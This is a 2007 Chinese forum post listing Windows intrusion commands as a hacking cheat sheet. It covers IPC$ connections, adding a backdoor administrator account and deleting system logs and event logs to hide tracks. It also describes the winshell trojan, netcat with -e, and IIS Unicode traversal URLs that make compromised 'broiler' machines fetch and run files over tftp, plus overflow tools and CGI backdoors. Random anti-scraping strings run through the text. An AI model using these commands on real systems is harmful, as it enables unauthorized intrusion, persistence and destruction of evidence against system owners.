找回密码
 入住遨海湾
搜索
网站解决方案专享优惠-3折上云
查看: 723|回复: 0

网管和黑客都必须知道的命令

[复制链接]
发表于 2007-12-22 22:40:00 | 显示全部楼层 |阅读模式

登录后查才能浏览下载更多咨询,有问题联系QQ:3283999

您需要 登录 才可以下载或查看,没有账号?入住遨海湾

×
  与远程主机建立空管连接 net use \IP地址ipc$ "" /use:"" , c6 I4 n. ~9 y8 C7 Q" u0 v  以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator" , d, p1 N7 y$ t' Q; R: I( W0 D  传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$ : r! o# { }4 R) k5 b+ N* K) O  查看远程主机时间 net time \IP地址 : ]" s' b* D3 Z* C   定时启动某个程序 at \IP地址 02:18 readme.exe 4 I1 m' G7 t5 N   查看共享 net view \IP地址 8 h4 z& L$ }8 |9 \5 e U' x   查看netbios工作组列表 nBTstat -A IP地址 . H* c' |* h9 b6 q   将远程主机C盘映射为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator" ( s0 g1 p f G( ?  这两条把自己增加到管理员组: net user 用户名 密码 /add 9 m# w9 `: Z' O! W- h3 N8 x/ H5 w5 d  net locaLGroup Administrators 用户名 /add ' N6 W4 _* ?# H: k1 e: P  断开连接 net use \IP地址ipc$ /delete & s) p. @6 c6 P' I 1 l9 W/ d U9 h E- x2 j# A7 z  扫尾: ; {& R$ v, M/ c2 l$ e8 m  del C:winntsystem32logfiles*.* - z- \; i" J+ d3 Q; [   del C:winntssytem32config*.evt ' F, d* `, z( y6 y  del C:winntsystem32dTCLog*.* # l. C: a9 }9 ?- ~  del C:winntsystem32*.log 5 S, v! @$ {# J8 r9 X  del C:winntsystem32*.txt ( [6 T+ K% f- s, V   del C:winnt*.txt + ]' Y% u# M) X% ?   del C:winnt*.log $ j3 R; _6 g- F y' F) p! ]4 B& g2 v$ ]* Y! {& z, @: ` 一、netsvc.exe j7 \+ d) B* b; a& `   下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: 4 R! F8 q. y8 S, h' R) t   netsvc /list \IP地址 % \0 ^" C0 C5 { a$ I) }; w  netsvc schedule \IP地址 /query }% G- U: ]; S4 h   netsvc \IP地址 schedule /start ! n" `5 |5 o& Z- V+ v& a j 3 ^1 u# a; R; F" F: D6 Z9 K 二、OpenTelnet.exe 3 \5 V7 u( m A+ @  远程启动主机的Telnet服务,并绑定端口到7878,例如: , Y3 P' q) Y* ]! \) @  OpenTelnet \IP地址 用户名 密码 1 7878 ; _ S! y/ _) e- V+ K& f  然后就可以telnet到主机的7878端口,进入DOS方式下: * b+ {* B3 _; t) P/ E   telnet IP地址 7878 3 m( [ _8 _% u5 K7 t r6 a% _' \0 W三、winshell.exe + T3 X% \7 o3 a  一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: - K" R) I% E3 D$ B9 m5 Z6 G   p Path (查看winshell主程序的路径信息) % m1 }4 q8 {0 B; U0 `0 F- E' V- O1 m   b reBoot (重新启动机器) & `/ Q7 R( Q5 C- N9 v- H   d shutDown (关闭机器) 9 {8 y2 p/ V" X8 `" a1 w! W9 R) Y& E  s Shell (执行后你就会看到可爱的“C:>”) ( q9 H5 p0 k. {6 v) F+ r  x eXit (退出本次登录会话,此命令并不终止winshell的运行) 6 b/ ^+ y; T H0 p   CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) ! L+ J0 Z$ e, G8 ^- I5 l& o ) v$ E3 r" D; Y; c- e四、3389登陆器,GUI方式登录远程主机的 6 ~8 b; S2 u3 o6 E" y: R9 y' V# X3 W+ C 五、elsave.exe - o2 s8 |; m+ W N* h! j  事件日志清除工具 # T4 Q) ]9 n/ [4 E  elsave -s \IP地址 -l "application" -C 0 u% O% d6 U: o2 c  elsave -s \IP地址 -l "system" -C ; E0 L, v6 D6 _. \% f   elsave -s \IP地址 -l "security" -C # V( f) W1 [4 q; @4 F' M  执行后成功清除应用程序日志,系统日志,安全日志 , l! c. j( M( _* S 六、hbulot.exe , |) R- O' \3 O7 O   开启win2kserver和winxp的3389服务 8 Z9 g# d8 L/ ]. l3 X2 _/ u   hbulot (/r) . U3 h0 c1 [; f; ~3 {! A- D3 w& q8 I5 n5 G5 n 七、nc.exe(netcat.exe) 5 \6 V L6 r* ~  一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 % ^4 V7 C/ u" I  想要连接到某处: nc (-options) hostname port(s)(ports) ... ! l! i1 X1 H! |# \   绑定端口等待连接: nc -l -p port (-options) (hostname) (port) 1 L, y; _; A f5 K$ o- | 8 F# d4 X/ A' a% W- w# Y% W2 H参数: 9 ?) _% t& D& d$ f! N' r  -e prog 程序重定向,一旦连接,就执行 (危险!) 7 p% o/ Q# ^; d/ J5 N   -g gateway source-routing hop point(s), up to 8 " S' c$ o1 [3 J- i  -G num source-routing pointer: 4, 8, 12, ... - z: G0 A0 l- w% Y  -h 帮助信息 3 |! V" ^6 A, o: e  -i secs 延时的间隔 8 c/ [9 A1 y' X% c+ G4 ?* v8 @7 }  -l 监听模式,用于入站连接 4 V: m3 C! [0 s! d0 g& {& O   -n 指定数字的IP地址,不能用hostname 7 D9 K8 O) y8 k" ^  -o file 记录16进制的传输 1 W# N8 E& f% N% J   -p port 本地端口号 . y6 Q0 R% ]1 ~* \, R   -r 任意指定本地及远程端口 9 i+ L0 R( D3 j3 v- I  -s addr 本地源地址 ' N- e2 ^* }5 G' a1 Y V  -u UDP模式 , [ A* q" c! b. V4 H* A! j3 s  -v 详细输出——用两个-v可得到更详细的内容 : n" a% R: u8 ?+ \3 s- M* ]   -w secs timeout的时间 * ? d5 N: G' F   -z 将输入输出关掉——用于扫描时 8 r# U5 I- F. }% o# _/ B 6 ^* n6 @, D8 B/ g; G6 j s w八、TFTPD32.EXE 0 a8 a. Q# a) G' B# B   把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: 0 g6 ]& D5 x" T1 P" U# Q; K- P9 M  http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名 6 w& F( j% e3 R0 p: |- z! M/ j9 [   然后可以直接令文件运行: . L9 j' ~- h- T, s& g  http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 : r- b0 ]7 j' V4 Z2 S$ k3 T4 Q2 M1 ^3 W 九、prihack.exe是IIS的printer远程缓冲区溢出工具 9 i0 K7 m$ y! M1 B. ]  idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 5 o9 H% g3 C; @2 G+ _( E; p ' K4 T6 d" w3 o! @" d一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接.
遨海湾-心灵的港湾 www.aosea.com
您需要登录后才可以回帖 登录 | 入住遨海湾

本版积分规则

网站解决方案专享优惠-3折上云

QQ|手机版|小黑屋|遨海湾超级社区

GMT+8, 2025-4-4 22:53

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表